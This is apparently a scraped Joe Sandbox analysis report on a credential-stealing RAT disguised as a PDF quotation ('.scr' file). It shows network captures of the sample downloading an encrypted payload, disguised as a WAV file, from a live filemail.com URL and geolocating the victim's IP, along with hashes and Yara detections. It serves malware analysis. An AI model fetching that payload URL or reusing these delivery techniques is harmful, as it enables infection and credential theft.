5f 6d 69 47 4f 77 46 33 49 34 79 52 62 4c 68 4a 79 32 77 26 61 6d 70 3b 70 6b 5f 76 69 64 3d 38 65 32 61 65 63 38 66 30 36 35 64 61 63 39 39 31 37 33 39 34 36 30 34 30 30 63 31 65 62 39 35 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95">here</a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49942	193.122.6.168	80	1988	C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2025 09:21:31.756268978 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Feb 14, 2025 09:21:32.404753923 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 14 Feb 2025 08:21:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Feb 14, 2025 09:21:32.408797026 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Feb 14, 2025 09:21:32.599126101 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 14 Feb 2025 08:21:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	193.30.119.107	443	1852	C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Timestamp	Bytes transferred	Direction	Data
2025-02-14 08:20:40 UTC	188	OUT	GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1 Host: 3007.filemail.com Connection: Keep-Alive
2025-02-14 08:20:40 UTC	320	IN	HTTP/1.1 200 OK Content-Length: 1150984 Content-Type: audio/wav Last-Modified: Thu, 13 Feb 2025 15:26:16 GMT Accept-Ranges: bytes ETag: cb2e947d0ea8b694087d4d2991e39ed1 X-Transfer-ID: cyflutwufnzcslm Content-Disposition: attachment; filename=Fkwnber.wav Date: Fri, 14 Feb 2025 08:20:40 GMT Connection: close
2025-02-14 08:20:40 UTC	3323	IN	Data Raw: 79 f9 4f 69 ff 97 f3 02 e2 f3 e7 40 13 e9 da 0f 05 2c a8 64 de b6 d7 f0 ed 5d be c0 1b 4e ae d7 8e 15 2c 4f c1 42 f9 43 02 4a f9 b6 41 f0 f7 68 0d 15 3c ef 9e 59 7c f0 49 d4 1a 16 db 82 62 84 71 e2 b7 ca 8b 50 0c 58 28 aa 64 65 c1 0f c6 6c b3 21 09 86 c5 9d 15 69 19 27 88 16 6d 69 3b 92 45 08 52 5d da 79 2e e0 45 00 b8 df 47 cb d2 00 f3 6c 82 b8 9f c8 80 d7 06 8d f7 2f a2 55 37 83 a3 2a 8c 17 ea 04 85 c8 8c 7c d0 40 c1 3f a9 3c 0b b3 56 37 6a 1f 70 ae b6 af 83 76 d6 3b 2b c9 53 ea 74 80 e8 38 f9 54 88 82 21 c5 4a 66 c3 1a 78 64 7a 57 08 2e 26 e2 5a 26 04 05 9d 98 15 a2 f4 7b 33 2e 98 e4 c4 f4 5a b2 89 71 01 96 38 93 9b 81 6e e7 49 80 d9 8f 94 19 c8 9a 26 6a c5 21 4d 1c 19 93 5c 3e 1a d1 05 e7 50 77 0f a7 f1 6c 7e 72 f8 7a 52 0d b5 70 22 3b e5 af 55 58 a5 Data Ascii: yOi@,d]N,OBCJAh<Y\|IbqPX(del!i'mi;ER]y.EGl/U7*\|@?<V7jpv;+St8T!JfxdzW.&Z&{3.Zq8nI&j!M\>Pwl~rzRp";UX
2025-02-14 08:20:40 UTC	8192	IN	Data Raw: 6c 51 9e 8f 7c a6 45 93 70 bf 75 e8 c2 ca 84 fb b3 3b 95 02 da f9 b6 08 6d 77 24 ff 54 a7 04 a2 69 51 61 15 18 56 c1 81 86 87 39 13 9c ff 07 97 8b 92 26 bd 04 27 d2 0c e7 c6 0c 5b 38 2e 72 6a 1c 75 7c c4 4b 4b bf a3 d4 76 cb 38 8b 0f 6c 42 32 9a b0 f5 6b af 40 78 a4 87 58 8d f9 5c 7d 58 5f cd a8 4c 6b b0 fa 69 50 74 a8 ed ae 38 f0 42 50 0c 87 8e 9e 05 58 3c 38 d6 cf aa c6 8c 87 62 03 32 36 73 84 55 4d 31 ba 0b 06 f0 29 2b 99 33 82 f5 04 73 ed 45 04 fe 5e c5 42 b3 09 95 5c 74 13 0a ec 0c e2 65 14 75 d7 3c 96 b9 f5 22 84 18 dc d7 6d d5 88 67 c7 4d c4 43 54 61 71 25 0a 1d 24 e7 8c b7 aa d3 fe 58 9f 73 9b fa db da 18 cb 75 3a f2 de 6a 6f 85 7f ce 3c a7 e8 3e 54 26 a6 0f 75 4b 85 e5 94 62 1d 09 a6 31 43 fd 23 99 30 3a 42 da 2e 36 05 c6 e8 b5 e2 74 00 09 84 98 Data Ascii: lQ\|Epu;mw$TiQaV9&'[8.rju\|KKv8lB2k@xX\}X_LkiPt8BPX<8b26sUM1)+3sE^B\teu<"mgMCTaq%$Xsu:jo<>T&uKb1C#0:B.6t
2025-02-14 08:20:40 UTC	8192	IN	Data Raw: b2 04 6b 32 12 60 b1 9a 46 51 46 29 eb bc b1 09 bf 3a 66 72 01 56 25 d7 38 d0 05 57 cf f9 44 2a 22 02 38 24 b7 df 9b 5a 46 0b 4b a2 fb fa b9 d2 f8 6b 2c 97 69 10 87 0c 02 3a 53 52 90 03 88 81 d9 4f 53 50 d3 9f c8 db 67 5c e2 84 16 ae b0 ff 65 a9 eb 57 81 26 b2 1d 57 cd c9 ad e3 4e 80 e5 03 8d f7 8b a2 84 2a 6c ba 31 ed d9 75 69 08 62 83 b3 dc a4 f0 de b4 64 92 6d a0 0e 2b 76 2e a8 12 8e 58 b5 55 c3 15 12 d9 e1 a0 2e ae 69 1b 0f a1 ad 9a cc 23 4d 16 52 ac 1e 8c d1 d2 a6 81 1a a8 f4 82 4f 80 62 f1 10 2a 25 3c 62 a0 2a 9e 44 d8 bb 71 c5 eb e4 eb c6 88 1a 16 8c d5 ad f1 99 89 ea 5c af 62 ad 44 ba 73 8f a7 40 fe 84 e2 81 4c f9 0f 19 70 4a 8f 76 5b a9 1d 03 52 a8 14 93 55 87 16 ba b7 1a 55 74 59 69 57 40 23 49 db 31 99 a8 5c 91 b8 8a 2b 16 92 a2 21 e4 5f e9 6c Data Ascii: k2`FQF):frV%8WD"8$ZFKk,i:SROSPg\eW&WNl1uibdm+v.XU.i#MROb%<bDq\bDs@LpJv[RUUtYiW@#I1\+!_l
2025-02-14 08:20:40 UTC	8192	IN	Data Raw: 18 29 63 7e 6c e4 25 66 e1 55 5c 0b 51 eb 72 24 ac e2 55 63 19 c3 f3 b1 bb 7d 79 96 b2 5e 60 7c e5 b5 3d 29 c9 18 74 37 cf 5b 50 fc 34 12 90 5e 82 aa f9 0d 07 99 e8 23 3a af 88 cd ba 19 77 6e 18 16 52 3d 3e 3d 54 e8 70 ad 44 20 54 81 f3 d0 51 8c d5 ca f7 57 ad a1 02 bf ae da 3e 0d aa ba 79 93 27 47 fa 93 5f a5 50 b9 4f c0 dd 6d 53 00 50 30 0b 8c a1 29 09 46 3c 82 33 97 24 6c 7e 09 54 d7 49 f3 f2 69 8c 98 f2 7c 4b 84 3e 28 23 63 56 76 69 f0 c4 07 e5 25 24 1c 3d dd da c5 c2 b0 e2 eb e1 86 aa f4 08 68 7b e8 1f 0c 9b 89 37 a1 cb af 07 f1 40 ed 99 ac 01 cd c2 4f 7e f1 80 b9 e8 b9 5d e3 fa ff b9 cd a0 a7 83 33 06 60 90 45 e0 d9 d6 dd 32 95 b3 46 14 f3 1a 0c e0 cb 52 02 08 b9 3b 79 21 97 cc a3 aa 6c 62 fc 82 3d 09 7a 4b 00 a8 65 49 ef e2 86 8d cf 1c 7f 3c a6 e6 Data Ascii: )c~l%fU\Qr$Uc}y^`\|=)t7[P4^#:wnR=>=TpD TQW>y'G_POmSP0)F<3$l~TIi\|K>(#cVvi%$=h{7@O~]3`E2FR;y!lb=zKeI<
2025-02-14 08:20:40 UTC	8192	IN	Data Raw: d6 29 dd 77 6f 7e b8 14 90 c2 f2 5d 1f 94 b5 8c b2 af 44 a1 7e b6 9a a0 16 9c 0e 81 86 6f ce 8b 12 48 8c 26 2c 7f 14 13 d3 23 3a 58 3e 88 47 5c 52 04 e2 20 72 eb c7 b8 a2 4e b7 40 65 e6 7d 2b d4 8f 50 eb 18 41 b2 70 9f cb d5 8e 4b f5 8c 28 e9 0c 05 4a 3b 36 8a 0c b5 2d d3 f8 46 f0 e4 03 91 d5 dc ee df f6 43 bb 25 60 2f 35 a5 56 cc cd 96 39 17 fe 69 c3 72 97 35 57 24 e0 15 c1 d1 cd af e0 d9 36 b9 c4 9c 10 0a 7e 17 1a c8 d7 8f 98 30 47 f9 da a8 15 b7 1c 6c 52 af f2 aa 70 4b fa aa 1f 74 b3 ed 4b c0 e9 f9 14 47 c4 a6 4b 28 a9 de a0 7c f9 fe a4 d9 e6 ce 5d 01 55 0c 7d 49 1c 18 10 4b 1a 67 d7 54 2e 45 9b 39 a3 1b c3 50 7d 3e aa 58 66 82 3e 0c 75 ab 22 b6 16 bc 9e 0a f5 d8 0b c8 36 28 0f fa 7f de 27 f6 54 27 a9 18 4f c2 71 2e 80 9c e6 b6 70 bf 19 e1 33 13 9c d7 Data Ascii: )wo~]D~oH&,#:X>G\R rN@e}+PApK(J;6-FC%`/5V9ir5W$6~0GlRpKtKGK(\|]U}IKgT.E9P}>Xf>u"6('T'Oq.p3
2025-02-14 08:20:40 UTC	8192	IN	Data Raw: d3 be 28 d6 35 85 32 5b 05 71 38 20 16 11 76 70 b9 a3 97 e0 a5 1d 01 e6 fc dc 9f 7d a9 c6 f4 b8 85 e5 dd 80 50 f3 0d 02 8d 43 64 9c 8f 13 a9 73 9b c4 88 df a1 f4 47 4d f0 6f 39 f6 b1 12 fb 6b 61 65 26 a0 8a ae 2e d8 47 2b 82 8d 83 c8 0b 3a 50 04 61 55 38 de a9 57 9d ce 71 5f 61 34 eb 6b cd d4 21 55 2b cf a4 65 93 53 b2 2d 76 0b b4 b1 60 01 0f e2 f0 a5 13 0b 10 c4 f9 58 87 55 a1 70 31 4c c3 da 2e b6 5f ee 2b 32 a8 88 67 d0 cc 5e 1f 2e 18 61 c7 b1 2a d8 8b 05 a9 b6 66 9f 9a f0 28 3c 09 6f 10 83 a4 0d 60 e4 99 48 6d 96 76 7f 51 cd ff 81 00 cd 71 34 9f 4d 80 8e 73 7b 31 cc d7 07 e9 f5 4b 37 bb 8f 75 81 72 d2 28 49 53 9e 6e 3f 2c cd 99 cc 8f f3 54 bc ce cc ed d4 68 82 d6 68 c1 4f 88 b4 68 58 45 8c e2 a0 25 cc 42 a0 95 09 d6 fb ca 6f dc 76 ef ed e3 7b d5 47 6d Data Ascii: (52[q8 vp}PCdsGMo9kae&.G+:PaU8Wq_a4k!U+eS-v`XUp1L._+2g^.a*f(<o`HmvQq4Ms{1K7ur(ISn?,ThhOhXE%Bov{Gm
2025-02-14 08:20:40 UTC	8192	IN	Data Raw: fd 15 4d 98 99 59 c2 5f 49 8c 4b 05 1d 94 39 ee f7 65 01 5a 5e c0 f5 f3 a8 1e 0e 99 14 c2 be 0a 4b 0e e5 0f 2e b6 ac cf 34 3f 87 e2 6c 13 3c 64 3d a5 ad 7d 8f a4 b9 87 c6 a9 38 84 be 82 b7 8c e7 5b bf 76 4b 78 1d c7 44 09 bd dd fc 0c 61 d6 b4 a6 0c e4 db 9a bc 6e 1c d0 f2 eb 6d a8 0e 1b ef fc b6 8f c1 5a 59 88 9c e3 ea e6 e1 34 f7 39 02 68 aa b4 1c 09 77 50 23 3f b5 8e 0d 75 1f b3 d0 4b 61 f2 b2 6b 92 a9 71 d2 e3 21 15 99 45 66 cf a0 ed 1b 4b 2a 7c f2 78 48 ae 6e 3d 9e 36 22 ee 1a 54 d6 b0 12 ae 72 d4 ff 3d dd 46 43 f9 df 8f 4a f7 6f 8d f8 1e 16 74 51 5c d9 be 90 8c 09 8e 9c 70 01 45 bb c1 30 d4 94 2a 82 40 de 74 58 11 9f 72 8f ba 7a 9c 79 aa a4 32 73 45 49 66 37 93 14 6d b5 e7 cf 0b 07 62 31 4c 94 d6 e1 60 96 05 c5 8d 15 29 e0 7f 4b 5b e0 94 02 14 b4 5c Data Ascii: MY_IK9eZ^K.4?l<d=}8[vKxDanmZY49hwP#?uKakq!EfK\|xHn=6"Tr=FCJotQ\pE0@tXrzy2sEIf7mb1L`)K[\
2025-02-14 08:20:41 UTC	8192	IN	Data Raw: b6 a2 61 0a 82 fd b3 be 76 9d 22 17 d3 00 b5 01 15 26 2c 9e 52 ab 7d 6c 03 3c e2 cd bd 3d 80 95 d9 63 9f 82 d0 09 2d bd dd 7a 6e 19 ef 21 c6 b7 47 02 d9 0e f2 ed 5f 52 d1 e0 35 a2 4b 1a af 3f 16 7d ba 8b 46 8a 6d 51 69 32 6c ae 10 d1 a1 47 d9 e5 c6 9e c6 6e 58 be 21 59 12 71 7d 88 91 90 4d 77 d1 46 23 7f da 50 44 94 db ba 4f 33 5a d8 ba ec 1d 36 fc 19 7a 1a df 19 9a ac 58 f2 49 9c 6d 21 a4 29 88 a0 4b 31 50 17 dd 0e 62 1c 41 c1 18 a5 a2 be df 3a bd 19 14 8f 34 f2 c2 13 fa 27 44 b1 2b c2 01 a5 1f f5 8f c2 73 46 ed 32 ba 30 26 d9 e6 25 42 39 76 04 6a 53 3a 3b 94 8c 62 74 8f a3 8a a8 5f 84 57 12 26 44 63 eb 7f a3 c9 0b ca 12 a5 92 b9 dc d6 30 07 18 00 d4 14 91 8c 3d f0 be 18 a0 ea e5 cd 08 ed 4a 26 e7 70 f4 ae 26 d1 1d fe 77 93 b5 da 63 c0 c5 9c 53 c5 d7 5e Data Ascii: av"&,R}l<=c-zn!G_R5K?}FmQi2lGnX!Yq}MwF#PDO3Z6zXIm!)K1PbA:4'D+sF20&%B9vjS:;bt_W&Dc0=J&p&wcS^
2025-02-14 08:20:41 UTC	8192	IN	Data Raw: 72 5e df c2 1a c1 6e 9e 16 3d 52 06 27 54 c4 22 47 37 4b a4 84 f0 54 db 1b 3d 6e 28 4a b8 64 9b 9e e6 1f 66 ce e1 0f d8 c2 90 18 51 d5 1e 7f 88 f8 2b b2 4a ad 67 61 e3 cf a4 81 48 2c d6 d2 54 57 af 4a c8 f2 97 a2 ed b1 46 dc f6 06 98 22 04 bd 13 e6 d1 d0 37 08 32 e5 01 2b 84 b7 4e 3b e9 d7 47 0d fb 93 ba 94 46 1d 70 2e 25 ed 6b 95 92 e3 c0 88 0d 57 76 40 dc 32 ff df ea 66 47 0d 92 6a a7 f5 77 77 f0 85 41 5c 0b 31 94 f5 aa 35 86 a5 05 aa 0b 42 a5 a0 2c fd 73 0b ea 6c d9 8c 4e 5d 45 b4 39 98 d7 c7 30 d6 ca 1d 05 33 1c fd 56 72 96 0b 51 84 1c 2b 41 38 a4 e6 17 8a ec 21 60 63 80 4e 3f 85 13 42 45 80 97 44 84 66 6b 32 6e ee 16 2b 35 c1 13 8f f2 46 ed d0 0d 08 7c de f1 72 78 ba 31 b0 01 ad e1 b0 71 74 8a 3b 66 ff 1e 06 5a 5d 3c 20 72 42 67 dc b6 6b 5c 90 8b fd Data Ascii: r^n=R'T"G7KT=n(JdfQ+JgaH,TWJF"72+N;GFp.%kWv@2fGjwwA\15B,slN]E903VrQ+A8!`cN?BEDfk2n+5F\|rx1qt;fZ]< rBgk\
2025-02-14 08:20:41 UTC	8192	IN	Data Raw: cf 62 d9 71 81 f3 2f 01 92 03 2d de 58 1a 2c b6 63 b3 b5 fb 45 41 61 4d 02 bf f5 f6 13 93 fd 19 de 82 cb 38 2d 4c e4 85 40 21 68 ad ab e2 5d ae 9c e7 90 23 11 7a ec 75 79 bd 7c 71 46 a5 d1 45 c1 fd f1 b3 b4 4d 60 4c 0c 12 d9 0c a6 c4 80 90 8c 7b 53 97 2e 6a 0b 66 a0 33 1d fd 9c 64 0f 43 ec 51 3e 34 90 f3 4f 2e 02 21 ae 0c 0d fb ff e6 d4 f3 03 a4 38 5a 17 39 85 81 01 43 c1 23 04 fb 1c 6a 8a 9a 82 d6 e9 4c 1c c7 25 7b c0 fc 95 0e 34 9a 23 04 5a 81 44 c4 f7 84 42 fb ac 73 60 60 59 38 86 2f 1f 11 c6 38 6f f3 d7 93 99 d6 54 7f 30 e5 23 be 71 c4 58 79 1b dc 53 c5 38 fb b9 9a 6c b5 be c0 e1 59 69 18 08 4a 9e 0d 94 9d 78 80 02 c1 9e d2 de 2b f3 ac b5 81 e9 b3 18 f6 c3 5a 4d b6 85 08 a8 ed 3a 08 ac 03 f4 c9 30 bb 4b 6c 2f fc 1a c0 20 4e de 00 a5 c3 2a 54 a9 47 4a Data Ascii: bq/-X,cEAaM8-L@!h]#zuy\|qFEM`L{S.jf3dCQ>4O.!8Z9C#jL%{4#ZDBs``Y8/8oT0#qXyS8lYiJx+ZM:0Kl/ N*TGJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49951	104.21.112.1	443	1988	C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Timestamp	Bytes transferred	Direction	Data
2025-02-14 08:21:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-02-14 08:21:33 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 14 Feb 2025 08:21:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 4836082 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8f7zAB%2FBW3fwCLPinU2X3%2BOyrdPWIcCfZc2CXtYQlqBPsp1Fz0w%2FrLXSIKgW5bs3qZpoY%2FWJ98xSVUN06DXXeJ9zCoGhaguryL4VmGnrPnIwZGiJ8%2F3bqsjPGZ6tKICYJBBNV4uE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 911ba5327c15c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1513&rtt_var=575&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1891191&cwnd=188&unsent_bytes=0&cid=e3c2393ed730c94e&ts=179&x=0"
2025-02-14 08:21:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	03:20:37
Start date:	14/02/2025
Path:	C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S
Imagebase:	0xcf0000
File size:	340'480 bytes
MD5 hash:	E63401DADBAE9A4EBD6CE665946EA633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2587912231.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:21:30
Start date:	14/02/2025
Path:	C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"
Imagebase:	0xdd0000
File size:	340'480 bytes
MD5 hash:	E63401DADBAE9A4EBD6CE665946EA633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3287257268.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_JANQUOTE312025#U00faPDF.scr

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
QUOTATION_JANQUOTE312025#U00faPDF.scr